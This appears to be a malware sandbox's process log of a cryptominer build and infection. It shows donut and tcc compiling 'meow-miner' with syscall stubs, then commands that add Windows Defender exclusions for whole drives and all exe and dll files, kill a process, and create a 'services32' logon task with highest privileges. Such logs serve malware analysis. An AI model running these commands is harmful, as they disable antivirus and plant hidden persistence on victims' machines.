"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow-uninstaller-payload.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "meow-uninstaller.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow-miner.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "meow.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd.exe"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c taskkill /f /PID "5912"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\taskkill.exe

taskkill /f /PID "5912"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services32.exe"

C:\Windows\system32\services32.exe

C:\Windows\system32\services32.exe

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe

"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost32"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=2472,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5428 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5784,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4292 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3560,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3472 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3428,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5896 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6028,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=6012 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6048,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5976 /prefetch:14

C:\Users\Admin\Downloads\TaskManager Installer.exe

"C:\Users\Admin\Downloads\TaskManager Installer.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9WZDNCRDMRGK?ocid=sfw-fab-control&referrer=psi

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://apps.microsoft.com/store/detail/9WZDNCRDMRGK?ocid=sfw-fab-control&referrer=psi

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x244,0x248,0x24c,0x240,0x2c0,0x7fff496ef208,0x7fff496ef214,0x7fff496ef220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2228,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1844,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:11

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2476,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:13

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3428,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=3496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3416,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4864,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=4904 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4868,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=4924 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5536,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5616,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5676,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5672 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5616,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe

cookie_exporter.exe --cookie-json=1128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5916,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=5636,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6332,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6652,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=6664 /prefetch:14

C:\Users\Admin\Downloads\TaskManager Installer (1).exe

"C:\Users\Admin\Downloads\TaskManager Installer (1).exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9WZDNCRDMRGK?ocid=sfw-fab-control&referrer=psi

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6680,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=7468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6096,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=3444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5684,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6092,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=6124 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6116,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6120,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=7444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6856,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=6244 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7736,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=6108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7632,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=4696 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=7676,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=7320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=5004,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=8024,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=8008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7364,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7968,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=7664 /prefetch:12

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=5052,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=7988 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=8368,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=8524 /prefetch:1

C:\Windows\system32\svchost.exe

